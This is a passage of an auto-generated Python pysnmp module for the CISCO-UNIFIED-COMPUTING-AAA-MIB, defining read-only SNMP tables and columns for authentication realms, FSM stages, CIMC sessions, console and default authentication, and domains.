CucsAaaEpFsmStageName, CucsNetworkSwitchId, CucsAaaTacacsPlusEpFsmStageName, CucsAaaUserEpFsmTaskItem, CucsConditionCause, CucsAaaAuthRealmFsmCurrentFsm, CucsAaaAccess, CucsAaaLdapEpFsmStageName, CucsAaaPwdPolicy, CucsAaaTacacsPlusEpFsmCurrentFsm, CucsConditionActionIndicator, CucsAaaRealmFsmTaskItem, CucsAaaRealmFsmCurrentFsm, CucsAaaUserInterface, CucsPolicyPolicyOwner, CucsAaaUserEpFsmStageName, CucsFsmCompletion, CucsAaaRealm, CucsAaaEpFsmCurrentFsm, CucsAaaLdapGroupRuleAuthorization, CucsConditionSeverity, CucsAaaAccountStatus, CucsFsmFsmStageStatus, CucsAaaRadiusEpFsmCurrentFsm, CucsAaaNoRolePolicy, CucsAaaRadiusEpFsmStageName, CucsAaaUserEpFsmCurrentFsm, CucsAaaRadiusService, CucsAaaDomainAuthRealm, CucsAaaSessionState, CucsAaaEpAccess, CucsAaaSshStr, CucsAaaConfigState, CucsConditionRemoteInvRslt, CucsAaaLdapGroupRuleTraversal, CucsAaaRealmFsmStageName, CucsConditionCode, CucsAaaLdapVendor, CucsFsmFlags, CucsAaaExtMgmtAccess, CucsAaaClear, CucsAaaAuthRealmFsmStageName, CucsAaaIpmiOverLan, CucsAaaCimcSessionType, CucsAaaLdapEpFsmCurrentFsm, CucsAaaEpFsmTaskItem, CucsAaaSession = mibBuilder.importSymbols("CISCO-UNIFIED-COMPUTING-TC-MIB", "CucsAaaEpFsmStageName", "CucsNetworkSwitchId", "CucsAaaTacacsPlusEpFsmStageName", "CucsAaaUserEpFsmTaskItem", "CucsConditionCause", "CucsAaaAuthRealmFsmCurrentFsm", "CucsAaaAccess", "CucsAaaLdapEpFsmStageName", "CucsAaaPwdPolicy", "CucsAaaTacacsPlusEpFsmCurrentFsm", "CucsConditionActionIndicator", "CucsAaaRealmFsmTaskItem", "CucsAaaRealmFsmCurrentFsm", "CucsAaaUserInterface", "CucsPolicyPolicyOwner", "CucsAaaUserEpFsmStageName", "CucsFsmCompletion", "CucsAaaRealm", "CucsAaaEpFsmCurrentFsm", "CucsAaaLdapGroupRuleAuthorization", "CucsConditionSeverity", "CucsAaaAccountStatus", "CucsFsmFsmStageStatus", "CucsAaaRadiusEpFsmCurrentFsm", "CucsAaaNoRolePolicy", "CucsAaaRadiusEpFsmStageName", "CucsAaaUserEpFsmCurrentFsm", "CucsAaaRadiusService", "CucsAaaDomainAuthRealm", "CucsAaaSessionState", "CucsAaaEpAccess", "CucsAaaSshStr", "CucsAaaConfigState", "CucsConditionRemoteInvRslt", "CucsAaaLdapGroupRuleTraversal", "CucsAaaRealmFsmStageName", "CucsConditionCode", "CucsAaaLdapVendor", "CucsFsmFlags", "CucsAaaExtMgmtAccess", "CucsAaaClear", "CucsAaaAuthRealmFsmStageName", "CucsAaaIpmiOverLan", "CucsAaaCimcSessionType", "CucsAaaLdapEpFsmCurrentFsm", "CucsAaaEpFsmTaskItem", "CucsAaaSession")
InetAddressIPv6, InetAddressIPv4 = mibBuilder.importSymbols("INET-ADDRESS-MIB", "InetAddressIPv6", "InetAddressIPv4")
SnmpAdminString, = mibBuilder.importSymbols("SNMP-FRAMEWORK-MIB", "SnmpAdminString")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
ObjectIdentity, Counter64, NotificationType, TimeTicks, ModuleIdentity, iso, Integer32, Gauge32, Unsigned32, Counter32, Bits, MibIdentifier, IpAddress, MibScalar, MibTable, MibTableRow, MibTableColumn = mibBuilder.importSymbols("SNMPv2-SMI", "ObjectIdentity", "Counter64", "NotificationType", "TimeTicks", "ModuleIdentity", "iso", "Integer32", "Gauge32", "Unsigned32", "Counter32", "Bits", "MibIdentifier", "IpAddress", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn")
DateAndTime, MacAddress, RowPointer, TruthValue, TimeStamp, TextualConvention, TimeInterval, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "DateAndTime", "MacAddress", "RowPointer", "TruthValue", "TimeStamp", "TextualConvention", "TimeInterval", "DisplayString")
cucsAaaObjects = ModuleIdentity((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2))
if mibBuilder.loadTexts: cucsAaaObjects.setLastUpdated('201601180000Z')
if mibBuilder.loadTexts: cucsAaaObjects.setOrganization('Cisco Systems Inc.')
cucsAaaAuthRealmTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1), )
if mibBuilder.loadTexts: cucsAaaAuthRealmTable.setStatus('current')
cucsAaaAuthRealmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaAuthRealmInstanceId"))
if mibBuilder.loadTexts: cucsAaaAuthRealmEntry.setStatus('current')
cucsAaaAuthRealmInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaAuthRealmInstanceId.setStatus('current')
cucsAaaAuthRealmDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmDn.setStatus('current')
cucsAaaAuthRealmRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmRn.setStatus('current')
cucsAaaAuthRealmConLogin = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 4), CucsAaaRealm()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmConLogin.setStatus('current')
cucsAaaAuthRealmDefLogin = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 5), CucsAaaRealm()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmDefLogin.setStatus('current')
cucsAaaAuthRealmDefRolePolicy = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 6), CucsAaaNoRolePolicy()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmDefRolePolicy.setStatus('current')
cucsAaaAuthRealmDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmDescr.setStatus('current')
cucsAaaAuthRealmFsmDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 8), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmDescr.setStatus('current')
cucsAaaAuthRealmFsmPrev = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmPrev.setStatus('current')
cucsAaaAuthRealmFsmProgr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 10), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmProgr.setStatus('current')
cucsAaaAuthRealmFsmRmtInvErrCode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 11), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmRmtInvErrCode.setStatus('current')
cucsAaaAuthRealmFsmRmtInvErrDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 12), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmRmtInvErrDescr.setStatus('current')
cucsAaaAuthRealmFsmRmtInvRslt = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 13), CucsConditionRemoteInvRslt()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmRmtInvRslt.setStatus('current')
cucsAaaAuthRealmFsmStageDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 14), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmStageDescr.setStatus('current')
cucsAaaAuthRealmFsmStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 15), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmStamp.setStatus('current')
cucsAaaAuthRealmFsmStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 16), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmStatus.setStatus('current')
cucsAaaAuthRealmFsmTry = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 17), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmTry.setStatus('current')
cucsAaaAuthRealmIntId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 18), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmIntId.setStatus('current')
cucsAaaAuthRealmName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 19), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmName.setStatus('current')
cucsAaaAuthRealmPolicyLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 20), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmPolicyLevel.setStatus('current')
cucsAaaAuthRealmPolicyOwner = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 21), CucsPolicyPolicyOwner()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmPolicyOwner.setStatus('current')
cucsAaaAuthRealmFsmTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 41), )
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmTable.setStatus('current')
cucsAaaAuthRealmFsmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 41, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaAuthRealmFsmInstanceId"))
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmEntry.setStatus('current')
cucsAaaAuthRealmFsmInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 41, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmInstanceId.setStatus('current')
cucsAaaAuthRealmFsmDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 41, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmDn.setStatus('current')
cucsAaaAuthRealmFsmRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 41, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmRn.setStatus('current')
cucsAaaAuthRealmFsmCompletionTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 41, 1, 4), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmCompletionTime.setStatus('current')
cucsAaaAuthRealmFsmCurrentFsm = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 41, 1, 5), CucsAaaAuthRealmFsmCurrentFsm()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmCurrentFsm.setStatus('current')
cucsAaaAuthRealmFsmDescrData = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 41, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmDescrData.setStatus('current')
cucsAaaAuthRealmFsmFsmStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 41, 1, 7), CucsFsmFsmStageStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmFsmStatus.setStatus('current')
cucsAaaAuthRealmFsmProgress = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 41, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmProgress.setStatus('current')
cucsAaaAuthRealmFsmRmtErrCode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 41, 1, 9), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmRmtErrCode.setStatus('current')
cucsAaaAuthRealmFsmRmtErrDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 41, 1, 10), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmRmtErrDescr.setStatus('current')
cucsAaaAuthRealmFsmRmtRslt = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 41, 1, 11), CucsConditionRemoteInvRslt()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmRmtRslt.setStatus('current')
cucsAaaAuthRealmFsmStageTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 42), )
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmStageTable.setStatus('current')
cucsAaaAuthRealmFsmStageEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 42, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaAuthRealmFsmStageInstanceId"))
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmStageEntry.setStatus('current')
cucsAaaAuthRealmFsmStageInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 42, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmStageInstanceId.setStatus('current')
cucsAaaAuthRealmFsmStageDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 42, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmStageDn.setStatus('current')
cucsAaaAuthRealmFsmStageRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 42, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmStageRn.setStatus('current')
cucsAaaAuthRealmFsmStageDescrData = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 42, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmStageDescrData.setStatus('current')
cucsAaaAuthRealmFsmStageLastUpdateTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 42, 1, 5), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmStageLastUpdateTime.setStatus('current')
cucsAaaAuthRealmFsmStageName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 42, 1, 6), CucsAaaAuthRealmFsmStageName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmStageName.setStatus('current')
cucsAaaAuthRealmFsmStageOrder = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 42, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmStageOrder.setStatus('current')
cucsAaaAuthRealmFsmStageRetry = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 42, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmStageRetry.setStatus('current')
cucsAaaAuthRealmFsmStageStageStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 42, 1, 9), CucsFsmFsmStageStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmStageStageStatus.setStatus('current')
cucsAaaCimcSessionTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55), )
if mibBuilder.loadTexts: cucsAaaCimcSessionTable.setStatus('current')
cucsAaaCimcSessionEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaCimcSessionInstanceId"))
if mibBuilder.loadTexts: cucsAaaCimcSessionEntry.setStatus('current')
cucsAaaCimcSessionInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaCimcSessionInstanceId.setStatus('current')
cucsAaaCimcSessionDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionDn.setStatus('current')
cucsAaaCimcSessionRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionRn.setStatus('current')
cucsAaaCimcSessionAdminState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 4), CucsAaaSessionState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionAdminState.setStatus('current')
cucsAaaCimcSessionId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionId.setStatus('current')
cucsAaaCimcSessionIntDel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 6), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionIntDel.setStatus('current')
cucsAaaCimcSessionIsDelete = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 7), CucsAaaClear()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionIsDelete.setStatus('current')
cucsAaaCimcSessionLastUpdatedTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 8), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionLastUpdatedTime.setStatus('current')
cucsAaaCimcSessionLoginTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 9), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionLoginTime.setStatus('current')
cucsAaaCimcSessionLsDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 10), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionLsDn.setStatus('current')
cucsAaaCimcSessionPid = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 11), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionPid.setStatus('current')
cucsAaaCimcSessionPnDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 12), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionPnDn.setStatus('current')
cucsAaaCimcSessionPriv = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 13), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionPriv.setStatus('current')
cucsAaaCimcSessionSourceAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 14), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionSourceAddr.setStatus('current')
cucsAaaCimcSessionType = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 15), CucsAaaCimcSessionType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionType.setStatus('current')
cucsAaaCimcSessionUser = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 16), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionUser.setStatus('current')
cucsAaaCimcSessionCimcAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 17), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionCimcAddr.setStatus('current')
cucsAaaConsoleAuthTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 2), )
if mibBuilder.loadTexts: cucsAaaConsoleAuthTable.setStatus('current')
cucsAaaConsoleAuthEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 2, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaConsoleAuthInstanceId"))
if mibBuilder.loadTexts: cucsAaaConsoleAuthEntry.setStatus('current')
cucsAaaConsoleAuthInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 2, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaConsoleAuthInstanceId.setStatus('current')
cucsAaaConsoleAuthDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 2, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaConsoleAuthDn.setStatus('current')
cucsAaaConsoleAuthRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 2, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaConsoleAuthRn.setStatus('current')
cucsAaaConsoleAuthDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 2, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaConsoleAuthDescr.setStatus('current')
cucsAaaConsoleAuthName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 2, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaConsoleAuthName.setStatus('current')
cucsAaaConsoleAuthProviderGroup = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 2, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaConsoleAuthProviderGroup.setStatus('current')
cucsAaaConsoleAuthRealm = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 2, 1, 8), CucsAaaRealm()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaConsoleAuthRealm.setStatus('current')
cucsAaaConsoleAuthOperProviderGroup = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 2, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaConsoleAuthOperProviderGroup.setStatus('current')
cucsAaaConsoleAuthOperRealm = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 2, 1, 10), CucsAaaRealm()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaConsoleAuthOperRealm.setStatus('current')
cucsAaaConsoleAuthUse2Factor = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 2, 1, 11), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaConsoleAuthUse2Factor.setStatus('current')
cucsAaaDefaultAuthTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3), )
if mibBuilder.loadTexts: cucsAaaDefaultAuthTable.setStatus('current')
cucsAaaDefaultAuthEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaDefaultAuthInstanceId"))
if mibBuilder.loadTexts: cucsAaaDefaultAuthEntry.setStatus('current')
cucsAaaDefaultAuthInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaDefaultAuthInstanceId.setStatus('current')
cucsAaaDefaultAuthDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDefaultAuthDn.setStatus('current')
cucsAaaDefaultAuthRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDefaultAuthRn.setStatus('current')
cucsAaaDefaultAuthDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDefaultAuthDescr.setStatus('current')
cucsAaaDefaultAuthName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDefaultAuthName.setStatus('current')
cucsAaaDefaultAuthProviderGroup = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDefaultAuthProviderGroup.setStatus('current')
cucsAaaDefaultAuthRealm = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1, 8), CucsAaaRealm()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDefaultAuthRealm.setStatus('current')
cucsAaaDefaultAuthRefreshPeriod = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1, 9), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDefaultAuthRefreshPeriod.setStatus('current')
cucsAaaDefaultAuthSessionTimeout = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1, 10), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDefaultAuthSessionTimeout.setStatus('current')
cucsAaaDefaultAuthOperProviderGroup = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1, 11), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDefaultAuthOperProviderGroup.setStatus('current')
cucsAaaDefaultAuthOperRealm = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1, 12), CucsAaaRealm()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDefaultAuthOperRealm.setStatus('current')
cucsAaaDefaultAuthUse2Factor = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1, 13), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDefaultAuthUse2Factor.setStatus('current')
cucsAaaDefaultAuthConfigState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1, 14), CucsAaaConfigState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDefaultAuthConfigState.setStatus('current')
cucsAaaDefaultAuthConfigStatusMessage = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1, 15), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDefaultAuthConfigStatusMessage.setStatus('current')
cucsAaaDomainTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 4), )
if mibBuilder.loadTexts: cucsAaaDomainTable.setStatus('current')
cucsAaaDomainEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 4, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaDomainInstanceId"))
if mibBuilder.loadTexts: cucsAaaDomainEntry.setStatus('current')
cucsAaaDomainInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 4, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaDomainInstanceId.setStatus('current')
